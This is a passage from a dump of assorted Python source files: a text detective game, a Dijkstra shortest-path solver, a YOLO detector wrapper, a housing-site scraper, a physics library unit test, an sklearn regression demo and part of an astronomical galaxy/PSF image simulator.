Where do you want to go?')\n        for place in sorted(PLACES):\n            placeInfo = visitedPlaces[place] if place in visitedPlaces else ''\n            nameLabel = '(' + place[0] + ')' + place[1:]\n            spacing = \" \" * (LONGEST_PLACE_NAME_LENGTH - len(place))\n            print(f'{nameLabel} {spacing}{placeInfo}')\n        print('(Q)UIT GAME')\n        while True:\n            response = input('> ').upper()\n            if response == '':\n                continue\n            if response == 'Q':\n                print('Thanks for playing!')\n                sys.exit()\n            if response in PLACE_FIRST_LETTERS.keys():\n                break\n        currentLocation = PLACE_FIRST_LETTERS[response]\n        continue\n\n    print(f'  You are at the {currentLocation}.')\n    currentLocationIdx = PLACES.index(currentLocation)\n    personHere = SUSPECTS[currentLocationIdx]\n    itemHere = ITEMS[currentLocationIdx]\n    print(f'  {personHere} with the {itemHere} is here.')\n\n    if personHere not in knownSuspectsAndItems:\n        knownSuspectsAndItems.append(personHere)\n    if ITEMS[currentLocationIdx] not in knownSuspectsAndItems:\n        knownSuspectsAndItems.append(ITEMS[currentLocationIdx])\n    if currentLocation not in visitedPlaces.keys():\n        visitedPlaces[currentLocation] = f'({personHere.lower()}, {itemHere.lower()})'\n\n    if personHere in accusedSuspects:\n        print('They are offended that you accused them, and will not help you with your investigation.')\n        print('You go back to your TAXI.')\n        print()\n        input('Press Enter to continue...')\n        currentLocation = 'TAXI'\n        continue\n\n    print()\n    print(f'(J) \"J\\'ACCUSE!\" ({accusationsLeft} accusations left)')\n    print('(Z) Ask if they know where ZOPHIE THE CAT is.')\n    print('(T) Go back to the TAXI.')\n    for idx, suspectOrItem in enumerate(knownSuspectsAndItems):\n        print(f'({idx+1}) Ask about {suspectOrItem}')\n\n    while True:\n        response = input('> ').upper()\n        # avoid eval on user input; tuple membership also rejects an empty response\n        if response in ('J', 'Z', 'T') or (response.isdecimal() and 0 < int(response) <= len(knownSuspectsAndItems)):\n            break\n\n    if response == 'J':\n        accusationsLeft -= 1\n        if personHere == culprit:\n            print('You\'ve cracked the case, Detective!')\n            print(f'It was {culprit} who had catnapped ZOPHIE THE CAT.')\n            minutesTaken = int(time.time() - startTime) // 60\n            secondsTaken = int(time.time() - startTime) % 60\n            print(\n                f'Good job! 
You solved it in {minutesTaken} min, {secondsTaken} sec.')\n            sys.exit()\n        else:\n            accusedSuspects.append(personHere)\n            print('You have accused the wrong person, Detective!')\n            print('They will not help you with any more clues.')\n            print('You go back to your TAXI.')\n            currentLocation = 'TAXI'\n\n    elif response == 'Z':\n        if personHere not in zophieClues:\n            print('\"I don\'t know anything about ZOPHIE THE CAT.\"')\n        elif personHere in zophieClues:\n            print(f'  They give you this clue: \"{zophieClues[personHere]}\"')\n            if zophieClues[personHere] not in knownSuspectsAndItems and zophieClues[personHere] not in PLACES:\n                knownSuspectsAndItems.append(zophieClues[personHere])\n\n    elif response == 'T':\n        currentLocation = 'TAXI'\n        continue\n\n    else:\n        inquiry = knownSuspectsAndItems[int(response) - 1]\n        if inquiry in (personHere, itemHere):\n            print('  They give you this clue: \"No comment.\"')\n        else:\n            print(f'  They give you this clue: \"{clues[personHere][inquiry]}\"')\n            if clues[personHere][inquiry] not in knownSuspectsAndItems and clues[personHere][inquiry] not in PLACES:\n                knownSuspectsAndItems.append(clues[personHere][inquiry])\n\n    input('Press Enter to continue...')\n","sub_path":"Chapter_38_Jaccuse/Jaccuse.py","file_name":"Jaccuse.py","file_ext":"py","file_size_in_byte":9378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"415035658","text":"# find shortest paths from a \"source\" node to all other nodes in a weighted directed graph,\n# producing a shortest-path tree (a subset of edges of the original graph).\n# It also applies to undirected graphs, since an undirected graph is just a directed graph with bidirectional connections.\n# BFS is actually Dijkstra for an unweighted graph (all weights are 1).\n\n# https://medium.com/basecs/finding-the-shortest-path-with-a-little-help-from-dijkstra-613149fbdc8e\n\nimport heapq\n\nclass Solution(object):\n    # If graph nodes are labelled by a number, we can use a list for best distance. A list uses less space than a dict.\n    def dijkstra_listForDist(self, edges, N):\n        graph = [{} for _ in range(N)]\n        for u, v, w in edges:\n            graph[u][v] = w\n\n        dist = [float('inf')] * N\n        dist[0] = 0\n\n        pq = [(0, 0)] # minHeap of (dist, node); dist is the key for ordering.\n        while pq:\n            d, node = heapq.heappop(pq)\n            # If dest is given, can return here because this is guaranteed the min distance to dest\n            # if node == dest: return d\n\n            # filter out duplicate paths to a node. Each node is finalized only once, via its min-distance path.\n            # Note shouldn't skip for d==dist[node], because the path w/ same dist may not have been visited yet.\n            if d > dist[node]: continue\n\n            for nei, weight in graph[node].items():\n                # d2 is the total distance to reach 'nei' (neighbor) node.\n                d2 = d + weight\n                if d2 < dist[nei]:\n                    heapq.heappush(pq, (d2, nei)) # smaller dist goes to front\n                    dist[nei] = d2\n\n        print(dist)\n        return\n\n    # Very useful for graphs where nodes are not labelled by a number. Refer to LC864 shortest-path-to-get-all-keys.py\n    def dijkstra_dictForDist(self, edges, N):\n        graph = [{} for _ in range(N)]\n        for u, v, w in edges:\n            graph[u][v] = w\n\n        dist = {}\n\n        pq = [(0, 0)] # minHeap of (dist, node); dist is the key for ordering.\n        while pq:\n            d, node = heapq.heappop(pq)\n            # If dest is given, can return here because this is guaranteed the min distance to dest\n            # if node == dest: return d\n\n            # filter out duplicate paths to a node. 
Each node is finalized only once, via its min-distance path.\n            if node in dist: continue\n            dist[node] = d\n\n            for nei, weight in graph[node].items():\n                if nei not in dist:\n                    heapq.heappush(pq, (d + weight, nei)) # smaller dist goes to front\n\n        print(dist)\n        return\n\nSolution().dijkstra_listForDist([(0,1,4), (0,2,2), (1,2,3), (1,3,2), (1,4,3), (2,1,1), (2,3,4), (2,4,5), (4,3,1)], 5)\n# dict implementation: {0: 0, 2: 2, 1: 3, 3: 5, 4: 6}\n# list implementation: [0,3,2,5,6]\n'''\nresult: dist = [0,3,2,5,6]\n    0\n   / \\\n  1 = 2\n  | X |\n  3 - 4\n'''\n\n","sub_path":"Python/dijkstra.py","file_name":"dijkstra.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"639921383","text":"from pseudosign import *\nfrom optparse import OptionParser\n\nparser=OptionParser()\nparser.add_option(\"-d\", \"--data\", dest=\"data\", help=\"to be signed data\", metavar=\"DATA\")\nparser.add_option(\"-p\", \"--privatekey\", dest=\"privKey\", help=\"private key\", metavar=\"PRIV\")\nparser.add_option(\"-c\", \"--certificate\", dest=\"certificate\", help=\"certificate to use\", metavar=\"CERT\")\n(options,args)=parser.parse_args()\n\n(R, s, digest,cert_dgst) = PseudonymSign(options.data, options.privKey, options.certificate)\nprint(R.output(compress=True, Ieee1609Dot2=True))\nprint(Hex(s, radix_256))\nprint(cert_dgst[-16:])\n","sub_path":"sign_explicit.py","file_name":"sign_explicit.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"346187139","text":"# -*- coding: utf-8 -*\n\nimport os\nimport string\nfrom PIL import Image\nimport json\nimport sys\nimport tempfile\n\nclass test_detector:\n    @classmethod\n    def readcmd(cls, cmd):\n        try:\n            ftmp = tempfile.NamedTemporaryFile(suffix='.out', prefix='tmp', delete=False)\n            fpath = ftmp.name\n            if os.name==\"nt\":\n                fpath = fpath.replace(\"/\",\"\\\\\") # for windows\n            ftmp.close()\n            os.system(cmd + \" > \" + fpath)\n            data = \"\"\n            with open(fpath, 'r') as file:\n                data = file.read()\n            os.remove(fpath)\n            return data\n        except:\n            print(sys.exc_info()[0])\n\n    def __init__(self):\n        pass\n\n\n    @classmethod\n    def test(cls, img, path, graph, session):\n        try:\n            #path = os.path.abspath(os.getcwd())\n            #print(path)\n            img.save(os.path.abspath(os.getcwd()) + '/original.' + img.format.lower())\n            modelname = ''\n            for filename in os.listdir(path):\n                if filename.endswith('.weights'):\n                    modelname = os.path.splitext(filename)[0]\n            fin = open(path + 'obj.data', 'rt')\n            data = fin.read()\n            data = data.replace('/mnt/2c67bd82-3031-40f8-8f53-58564ba23509/Graphics/yolo/test/', path).replace('cfg/' + modelname,'')\n            fin.close()\n            fin = open(path + 'obj.data', 'wt')\n            fin.write(data)\n            fin.close()\n            resultstr = cls.readcmd('./darknet detector test ' + path + '\"obj.data\" ' + path + '\"yolov4.cfg\" ' + path + modelname + '\".weights\" \"original.' 
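The commented-out early return in both Dijkstra methods above deserves spelling out: heap pops come off in non-decreasing distance order, so the first time the destination is popped its distance is final. A sketch of that single-target variant, using the same adjacency format the methods build:

```python
import heapq

def dijkstra_to_dest(graph, src, dest):
    # graph: list of {neighbor: weight} dicts, as built in dijkstra.py above
    dist = {src: 0}
    pq = [(0, src)]
    while pq:
        d, node = heapq.heappop(pq)
        if node == dest:
            return d              # first pop of dest is its shortest distance
        if d > dist.get(node, float('inf')):
            continue              # stale entry; a shorter path was already found
        for nei, w in graph[node].items():
            if d + w < dist.get(nei, float('inf')):
                dist[nei] = d + w
                heapq.heappush(pq, (d + w, nei))
    return float('inf')           # dest unreachable
```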
+ img.format.lower() + '\" -gpus 0 -ext_output 2>&1 | tee -a ./temp.log')\n            #print('\\n\\n\\n\\n\\n\\n\\n')\n            #print(resultstr.split('\\n'))\n            resultarr = resultstr.split('\\n')\n            returnarr = []\n            for line in resultarr:\n                if line.startswith('[[') and line.endswith(']]'):\n                    #print(line + '\\n')\n                    tmparr = line.replace('[[','').replace(']]','').split(' ')\n                    tmpval = {\n                        'class':tmparr[4],\n                        'classResult':[{'score': tmparr[5],'boundingBox':[tmparr[0], tmparr[1], tmparr[2], tmparr[3]]}]\n                    }\n                    # merge detections of an already-seen class; otherwise add a new entry\n                    for obj in returnarr:\n                        if obj['class'] == tmparr[4]:\n                            obj['classResult'].append({'score':tmparr[5],'boundingBox':[tmparr[0], tmparr[1], tmparr[2], tmparr[3]]})\n                            break\n                    else:\n                        returnarr.append(tmpval)\n            returnval = {\n                'isSuccess':'true',\n                'ErrorMsg':'',\n                'result':returnarr\n            }\n            return json.dumps(returnval)\n        except:\n            returnval = {\n                'isSuccess': 'false',\n                'ErrorMsg': str(sys.exc_info()[0]),\n            }\n            return json.dumps(returnval)\n\n","sub_path":"test_detector.py","file_name":"test_detector.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"410130463","text":"# -*- coding: utf-8 -*-\n\n\nimport unittest\nimport numpy\n#import h5py\n\n\n\"\"\"\n*******************************************************************************\n\n\n    Tests of the quantarhei.qm.corfunctions.cfmatrix module\n\n\n*******************************************************************************\n\"\"\"\n\n\nimport quantarhei as qr\nimport quantarhei.qm.corfunctions as cors\n\nclass TestCFMatrix(unittest.TestCase):\n    \"\"\"Tests of the matrix of correlation functions module\n    \n    \n    \"\"\"\n    \n    def setUp(self, verbose=False):\n        \"\"\"Initializes the calculation\n        \n        \"\"\"\n        \n        self.verbose = verbose\n        \n        self.time = qr.TimeAxis(0, 1000, 1.0)\n        self.temperature = 300\n        pars1 = dict(ftype=\"OverdampedBrownian\", reorg=30, cortime=100,\n                     T=self.temperature)\n        pars2 = dict(ftype=\"OverdampedBrownian\", reorg=80, cortime=200,\n                     T=self.temperature)\n\n        self.cf1 = qr.CorrelationFunction(self.time, pars1)\n        self.cf2 = qr.CorrelationFunction(self.time, pars2)\n\n    \n    def test_of_creation(self):\n        \"\"\"(CorrelationFunctionMatrix) Test of creation \n        \n        \"\"\"\n        cfm = cors.CorrelationFunctionMatrix(self.time, nob=5)\n        \n        cfm.set_correlation_function(self.cf1, [(1,1),(2,2),(3,3)])\n        cfm.set_correlation_function(self.cf2, [(4,4)])\n        \n        \n    def test_of_temperature_retrieval(self):\n        \"\"\"(CorrelationFunctionMatrix) Test of temperature retrieval \n        \"\"\"\n        cfm = cors.CorrelationFunctionMatrix(self.time, nob=5)\n        \n        cfm.set_correlation_function(self.cf1, [(1,1),(2,2),(3,3)])\n        cfm.set_correlation_function(self.cf2, [(4,4)])\n        \n        T = cfm.get_temperature()\n        \n        numpy.testing.assert_almost_equal(T, self.temperature)\n\n    \n\n","sub_path":"tests/unit/qm/corfunctions/cfmatrix_test.py","file_name":"cfmatrix_test.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"613790334","text":"#########################################################\n# File Name: crawlingSSH.py\n# Author: Z.Z\n# Email: zhzhang2015@sina.com\n# Start Time: Thu 04 Jan 2018 05:36:37 PM CET\n#########################################################\n#\n#!/usr/bin/python3\n#-*- coding: utf-8 -*-\n# Strangely enough, I tried this before and it never worked, but somehow it succeeded today, which is amazing. I should probably try again tomorrow in case it stops working; after all, my browser still holds a lot of local cookies, and I am not sure whether that is the reason. Let's wait and see.\nimport json\nimport logging \nfrom requests import Session\n\ntrue = 
True\nresponseResultFile = \"response.json\"\n\nlogging.basicConfig(level = logging.INFO)\nlogger = logging.getLogger(\"REQUESTS\")\n\nbaseUrl = \"https://aanbod.sshxl.nl/ons-huuraanbod\"\nxhrUrl = 'https://aanbod.sshxl.nl/usercontrols/kim/aanbod/ikwilhuren.asmx/GetAanbodData'\n\nlogger.info(\" Start to set up session with \"+baseUrl)\ns = Session()\ns.get(baseUrl)\n\nlogger.info(\" Setting up payload and request headers\")\npayload = json.dumps({\"aanbodtypes\":[],\"filters\":[],\"filtersoorten\":[\"Aggregatie\",\"HuurtoeslagMogelijk\",\"Type\"],\"skipFirstFilter\":true})\nrequestHeader = {'Accept':'application/json, text/javascript, */*; q=0.01',\n        'Accept-Encoding':'gzip, deflate, br',\n        'Accept-Language':'zh-CN,zh;q=0.8',\n        'Connection':'keep-alive',\n        'Content-Length':'',\n        'Content-Type':'application/json; charset=UTF-8',\n        #'Cookie':'BataviaWonen.Session=o1tm5k2dbkpgjphfdkcgqlkd; Language=en-US; __atuvc=18%7C52%2C27%7C1; __atuvs=5a4e471d4b1514da000; _ga=GA1.2.695652008.1514296068; _gid=GA1.2.2144178308.1514815281; _gat=1; __AntiForgeryToken=xskxx0owd5Ls6/SCkOiy5KZ5GU3uNxxnITprVs0EQWJE6+FLmEvq+OxT7W7teUPFnM2yhVNAhz8QkPEH2WEA7B8N56jjjL6ekkMz7SrtdF4=; huuraanbodsettings-%2Fons-huuraanbod=%7B%22filters%22%3A%5B%5D%2C%22aanbodtypes%22%3A%5B%5D%2C%22sorting%22%3A%7B%22field%22%3A%22Naam%22%2C%22reverse%22%3Afalse%2C%22istext%22%3Atrue%7D%2C%22template%22%3A%22templateLijst%22%7D',\n        'Host':'aanbod.sshxl.nl',\n        'Origin':'https://aanbod.sshxl.nl',\n        'Referer':'https://aanbod.sshxl.nl/',\n        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',\n        'X-Requested-With':'XMLHttpRequest'\n        }\ns.headers.update(requestHeader)\n\nlogger.info(\" Post data to xhr dealer.\")\nr = s.post(xhrUrl, data = payload)\ntry:\n    logger.info(\" Fetch data from the xhr dealer\")\n    responseText = r.text\nexcept:\n    logger.error(\" Failed at POST.\")\n    raise\n\nlogger.info(\" Dump data to file: \" + responseResultFile)\ndata = json.loads(responseText)\nwith open(responseResultFile, 'w') as f:\n    f.write(json.dumps(data, indent=4))\n","sub_path":"spiders/crawlingSSH.py","file_name":"crawlingSSH.py","file_ext":"py","file_size_in_byte":2850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"623505501","text":"\n\nfrom xai.brain.wordbase.nouns._instalment import _INSTALMENT\n\n#class header\nclass _INSTALMENTS(_INSTALMENT, ):\n\tdef __init__(self,): \n\t\t_INSTALMENT.__init__(self)\n\t\tself.name = \"INSTALMENTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"instalment\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_instalments.py","file_name":"_instalments.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"605874010","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 11 13:13:07 2017\n\n@author: zhangye\n\"\"\"\n\nimport numpy as np\nfrom sklearn.datasets import load_boston\nboston = load_boston()\n# read the Boston house-price data from sklearn's built-in datasets\nfrom sklearn.cross_validation import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(boston.data, boston.target, test_size = 0.25, random_state = 33)\n# split the data into 75% training and 25% test sets\nfrom sklearn.preprocessing import StandardScaler\nss_X = StandardScaler()\nss_y = StandardScaler()\n\nX_train = ss_X.fit_transform(X_train)\nX_test = ss_X.transform(X_test)\ny_train = ss_y.fit_transform(y_train)\ny_test = 
ss_y.transform(y_test)\n# standardize the features and the target\n\nfrom sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor, GradientBoostingRegressor\n# import the random forest, extra trees, and gradient boosting regressors\nrfr = RandomForestRegressor()\nrfr.fit(X_train,y_train)\nrfr_y_predict = rfr.predict(X_test)\n\netr = ExtraTreesRegressor()\netr.fit(X_train, y_train)\netr_y_predict = etr.predict(X_test)\n\ngbr = GradientBoostingRegressor()\ngbr.fit(X_train,y_train)\ngbr_y_predict = gbr.predict(X_test)","sub_path":"chapter_two/code45.py","file_name":"code45.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
{"seq_id":"15344717","text":"import os\nimport sys\nimport matplotlib.gridspec as gridspec\nimport numpy as np\n\nimport astropy.io.fits as pyfits\nimport matplotlib.pyplot as plt\n\nimport logging\n\nfrom astropy.visualization import simple_norm\nfrom scipy.special import gammaincinv\nfrom astropy.table import Table\nimport sncosmo\nimport astropy.units as u\nimport timeit\nfrom scipy.optimize import minimize\n\nimport psf_mog_fitting as pmf\n\n\ndef gridcreate(name, y, x, ratio, z, **kwargs):\n    # Function that creates a blank axis canvas; each figure gets a name (or alternatively a number\n    # if none is given), and gridspec creates an N*M grid onto which you can create axes for plots.\n    # This returns a gridspec \"instance\" so you can specify which figure to put the axis on if you\n    # have several on the go.\n    plt.figure(name, figsize=(z*x, z*ratio*y))\n    gs = gridspec.GridSpec(y, x, **kwargs)\n    return gs\n\n\ndef model_number(run_minutes, n_runs):\n    # assuming a static time for each run; dominated by fit, not creation currently\n    n_filt_choice = 0\n    n = 7 # including R, eventually\n    for k in np.arange(2, n+1):\n        n_filt_choice += np.math.factorial(n) / np.math.factorial(k) / np.math.factorial(n - k)\n    # cadence can vary from, say, 5 days to 25 days (5 days being the minimum needed, and 25 days\n    # giving 2 data points per lightcurve), so cadence could be varied in 5s initially, and thus\n    cadence_interval = 5\n    cadences = np.arange(5, 25+1e-10, cadence_interval)\n    n_cadence = len(cadences)\n\n    n_tot = n_filt_choice * n_cadence\n\n    time = n_tot * run_minutes * n_runs\n\n    print(\"{} choices, {} runs, {:.0f}/{:.0f}/{:.0f} approximate minutes/hours/days\".format(n_tot, n_runs, time, time/60, time/60/24))\n\n\ndef gaussian_2d(x, x_t, mu, mu_t, sigma):\n    det_sig = np.linalg.det(sigma)\n    p = np.matmul(x_t - mu_t, np.linalg.inv(sigma))\n    # if we don't take the 0, 0 slice we accidentally propagate to shape (len, len, len, len) by\n    # having (len, len, 1, 1) shape passed through\n    mal_dist_sq = np.matmul(p, (x - mu))[:, :, 0, 0]\n    gauss_pdf = np.exp(-0.5 * mal_dist_sq) / (2 * np.pi * np.sqrt(det_sig))\n    return gauss_pdf\n\n\n# flat and dark can be loaded from the stips fits file or found elsewhere, they are simply input\n# files to be multiplied by/added to the original data.\ndef add_dark(image, d):\n    # choice returns a random choice from np.arange(a) if just given a single integer a\n    x_i, y_j = (np.random.choice(d.shape[i]-image.shape[i]) for i in [0, 1])\n    image += d[x_i:x_i + image.shape[0], y_j:y_j + image.shape[1]]\n    return image\n\n\ndef mult_flat(image, d):\n    # choice returns a random choice from np.arange(a) if just given a single integer a\n    x_i, y_j = (np.random.choice(d.shape[i]-image.shape[i]) for i in [0, 1])\n    image *= d[x_i:x_i + image.shape[0], y_j:y_j + image.shape[1]]\n    return image\n\n\n# read noise is just a constant single read value\ndef 
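The code45.py record above fits three ensemble regressors but never scores them. A hedged follow-on evaluation sketch using the variables it defines (the old 0.x sklearn API shown there accepted 1-D targets in the scaler):

```python
from sklearn.metrics import r2_score, mean_absolute_error

for name, pred in [('random forest', rfr_y_predict),
                   ('extra trees', etr_y_predict),
                   ('gradient boosting', gbr_y_predict)]:
    # invert the target scaling so the MAE is back in the original price units
    y_true = ss_y.inverse_transform(y_test)
    y_hat = ss_y.inverse_transform(pred)
    print(name, 'R2:', r2_score(y_true, y_hat),
          'MAE:', mean_absolute_error(y_true, y_hat))
```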
add_read(image, readnoise):\n image += readnoise\n return image\n\n\ndef set_exptime(image, exptime):\n image *= exptime\n return image\n\n\ndef add_background(image, bkg):\n image += bkg\n return image\n\n\n# if lambda is a numpy array then size is ignored and each value is used creating a new array of\n# the original shape. we could instead, for large lambda, generate a gaussian of mean 0 and\n# variance lambda; this is the more general formula allowing for low counts, however.\ndef add_poisson(image):\n return np.random.poisson(lam=image).astype(float)\n\n\ndef mog_galaxy(pixel_scale, filt_zp, psf_c, gal_params):\n mu_0, n_type, e_disk, pa_disk, half_l_r, offset_r, Vgm_unit, cms, vms, mag, offset_ra_pix, \\\n offset_dec_pix = gal_params\n\n cm_exp = np.array([0.00077, 0.01077, 0.07313, 0.37188, 1.39727, 3.56054, 4.74340, 1.78732])\n vm_exp_sqrt = np.array([0.02393, 0.06490, 0.13580, 0.25096, 0.42942, 0.69672, 1.08879,\n 1.67294])\n cm_dev = np.array([0.00139, 0.00941, 0.04441, 0.16162, 0.48121, 1.20357, 2.54182, 4.46441,\n 6.22821, 6.15393])\n vm_dev_sqrt = np.array([0.00087, 0.00296, 0.00792, 0.01902, 0.04289, 0.09351, 0.20168, 0.44126,\n 1.01833, 2.74555])\n\n # this requires re-normalising as Hogg & Lang (2013) created profiles with unit intensity at\n # their half-light radius, with total flux for the given profile simply being the sum of the\n # MoG coefficients, cm, so we ensure that sum(cm) = 1 for normalisation purposes\n cms = cm_dev / np.sum(cm_dev) if n_type == 4 else cm_exp / np.sum(cm_exp)\n # Vm is always circular so this doesn't need to be a full matrix, but PSF m/V do need to\n vms = np.array(vm_dev_sqrt)**2 if n_type == 4 else np.array(vm_exp_sqrt)**2\n\n mks = psf_c[:, [0, 1]].reshape(-1, 2, 1)\n pks = psf_c[:, 5] # what is referred to as 'c' in psf_mog_fitting is p_k in H&L13\n sx, sy, r = psf_c[:, 2], psf_c[:, 3], psf_c[:, 4]\n Vks = np.array([[[sx[q]**2, r[q]*sx[q]*sy[q]], [r[q]*sx[q]*sy[q], sy[q]**2]] for\n q in range(0, len(sx))])\n # covariance matrix and mean positions given in pixels, but need converting to half-light\n mks *= (pixel_scale / half_l_r)\n Vks *= (pixel_scale / half_l_r)**2\n\n len_image = np.ceil(2.2*offset_r / pixel_scale).astype(int)\n len_image = len_image + 1 if len_image % 2 == 0 else len_image\n len_image = max(25, len_image)\n image = np.zeros((len_image, len_image), float)\n x_cent, y_cent = (image.shape[0]-1)/2, (image.shape[1]-1)/2\n\n # positons should be in dimensionless but physical coordinates in terms of Re; first the\n # Xg vector needs converting from its given (ra, dec) to pixel coordiantes, to be placed\n # in the xy grid correctly (currently this just defaults to the central pixel, but it may\n # not in the future)\n xg = np.array([[(offset_ra_pix + x_cent) * pixel_scale / half_l_r],\n [(offset_dec_pix + y_cent) * pixel_scale / half_l_r]])\n x_pos = (np.arange(0, image.shape[0])) * pixel_scale / half_l_r\n y_pos = (np.arange(0, image.shape[1])) * pixel_scale / half_l_r\n x, y = np.meshgrid(x_pos, y_pos, indexing='xy')\n # n-D gaussians have mahalnobis distance (x - mu)^T Sigma^-1 (x - mu) so coords_t and m_t\n # should be *row* vectors, and thus be shape (1, x) while coords and m should be column\n # vectors and shape (x, 1). 
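The single-purpose detector-effect helpers above (exposure time, background, dark, flat, Poisson, read noise) are meant to be chained; this section never shows the order, so the composition below is an assumption, with signal-dependent shot noise applied before the signal-independent read noise:

```python
def add_detector_effects(ideal_rate, exptime, bkg, dark_img, flat_img, readnoise):
    # a guessed composition of the helpers defined above: counts/s -> counts,
    # add sky and dark, apply the flat, then shot noise, then read noise
    image = set_exptime(np.copy(ideal_rate), exptime)
    image = add_background(image, bkg)
    image = add_dark(image, dark_img)
    image = mult_flat(image, flat_img)
    image = add_poisson(image)
    image = add_read(image, readnoise)
    return image
```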
starting with coords, we need to add the grid of data, so if\n # this array has shape (1, 2, y, x), and if we transpose it it'll have shape (x, y, 2, 1)\n coords = np.transpose(np.array([[x, y]]))\n # the \"transpose\" of the vector x turns from being a column vector (shape = (2, 1)) to a\n # row vector (shape = (1, 2)), but should still have external shape (x, y), so we start\n # with vector of (2, 1, y, x) and transpose again\n coords_t = np.transpose(np.array([[x], [y]]))\n # total flux in galaxy -- ensure that all units end up in flux as counts/s accordingly\n Sg = 10**(-1/2.5 * (mag - filt_zp))\n for k in range(0, len(mks)):\n pk = pks[k]\n Vk = Vks[k]\n mk = mks[k]\n for m in range(0, len(vms)):\n cm = cms[m]\n vm = vms[m]\n # Vgm = RVR^T = vm RR^T given that V = vmI\n Vgm = vm * Vgm_unit\n # reshape m and m_t to force propagation of arrays, remembering row vectors are\n # (1, x) and column vectors are (x, 1) in shape\n m = (mk + xg).reshape(1, 1, 2, 1)\n m_t = m.reshape(1, 1, 1, 2)\n V = Vgm + Vk\n g_2d = gaussian_2d(coords, coords_t, m, m_t, V)\n # having converted the covariance matrix to half-light radii, we need to account for a\n # corresponding reverse correction so that the PSF dimensions are correct, which are\n # defined in pure pixel scale\n image += Sg * cm * pk * g_2d / (half_l_r / pixel_scale)**2\n return image\n\n\ndef mog_add_psf(image, psf_params, filt_zp, psf_c):\n image = np.copy(image)\n offset_ra_pix, offset_dec_pix, mag = psf_params\n x_cent, y_cent = (image.shape[0]-1)/2, (image.shape[1]-1)/2\n xg = np.array([[(offset_ra_pix + x_cent) * pixel_scale],\n [(offset_dec_pix + y_cent) * pixel_scale]])\n x_pos = (np.arange(0, image.shape[0])) * pixel_scale\n y_pos = (np.arange(0, image.shape[1])) * pixel_scale\n x, y = np.meshgrid(x_pos, y_pos, indexing='xy')\n # n-D gaussians have mahalnobis distance (x - mu)^T Sigma^-1 (x - mu) so coords_t and m_t\n # should be *row* vectors, and thus be shape (1, x) while coords and m should be column\n # vectors and shape (x, 1). 
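The flux conversion used in both `mog_galaxy` and `mog_add_psf`, `Sg = 10**(-1/2.5 * (mag - filt_zp))`, is the usual zero-point relation: a source at the zero-point magnitude yields 1 count/s, and each 2.5 mag fainter divides the rate by 10. A quick numeric check (the zero point is illustrative):

```python
filt_zp = 26.0                                  # illustrative zero point
for mag in (26.0, 28.5, 31.0):
    print(mag, 10**(-1/2.5 * (mag - filt_zp)))  # 1.0, 0.1, 0.01 counts/s
```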
starting with coords, we need to add the grid of data, so if\n # this array has shape (1, 2, y, x), and if we transpose it it'll have shape (x, y, 2, 1)\n coords = np.transpose(np.array([[x, y]]))\n # the \"transpose\" of the vector x turns from being a column vector (shape = (2, 1)) to a\n # row vector (shape = (1, 2)), but should still have external shape (x, y), so we start\n # with vector of (2, 1, y, x) and transpose again\n coords_t = np.transpose(np.array([[x], [y]]))\n\n mks = psf_c[:, [0, 1]].reshape(-1, 2, 1)\n pks = psf_c[:, 5] # what is referred to as 'c' in psf_mog_fitting is p_k in H&L13\n sx, sy, r = psf_c[:, 2], psf_c[:, 3], psf_c[:, 4]\n Vks = np.array([[[sx[q]**2, r[q]*sx[q]*sy[q]], [r[q]*sx[q]*sy[q], sy[q]**2]] for\n q in range(0, len(sx))])\n # convert PSF position and covariance matrix to arcseconds, from pixels\n mks *= pixel_scale\n Vks *= pixel_scale**2\n\n # total flux in source -- ensure that all units end up in flux as counts/s accordingly\n Sg = 10**(-1/2.5 * (mag - filt_zp))\n count = np.sum(image)\n for k in range(0, len(mks)):\n pk = pks[k]\n V = Vks[k]\n mk = mks[k]\n # reshape m and m_t to force propagation of arrays, remembering row vectors are\n # (1, x) and column vectors are (x, 1) in shape\n m = (mk + xg).reshape(1, 1, 2, 1)\n m_t = m.reshape(1, 1, 1, 2)\n g_2d = gaussian_2d(coords, coords_t, m, m_t, V)\n # equivalent to the mog_galaxy version, we converted the covariance matrix to arcseconds\n # so need to undo the unit change to get the correct dimensions, having fit for the PSF\n # in pure pixels\n image += Sg * pk * g_2d * pixel_scale**2\n return image\n\n\ndef make_figures(filters, img_sn, img_no_sn, diff_img, exptime, directory, counter, times,\n random_flag):\n nfilts = len(filters)\n ntimes = len(times)\n if random_flag:\n ntimes_array = [np.random.choice(ntimes)]\n nfilts_array = [np.random.choice(nfilts)]\n ntimes, nfilts = 1, 1\n else:\n ntimes_array = np.arange(0, ntimes)\n nfilts_array = np.arange(0, nfilts)\n gs = gridcreate('111', 3*ntimes, nfilts, 0.8, 15)\n # if random_flag is False then k_ and k are the same, otherwise k_ should be 0 (or 0, 1, 2) if\n # random_flag allows for a larger-than-one subset in the future, while k can be (2, 6, 10, 50),\n # etc., striding at random\n for k_, k in enumerate(ntimes_array):\n for j_, j in enumerate(nfilts_array):\n image = img_sn[k][j]\n image_shifted = img_no_sn[j]\n image_diff = diff_img[k][j]\n norm = simple_norm(image / exptime, 'linear', percent=99.9)\n ax = plt.subplot(gs[0 + 3*k_, j_])\n img = ax.imshow(image.T / exptime, origin='lower', cmap='viridis', 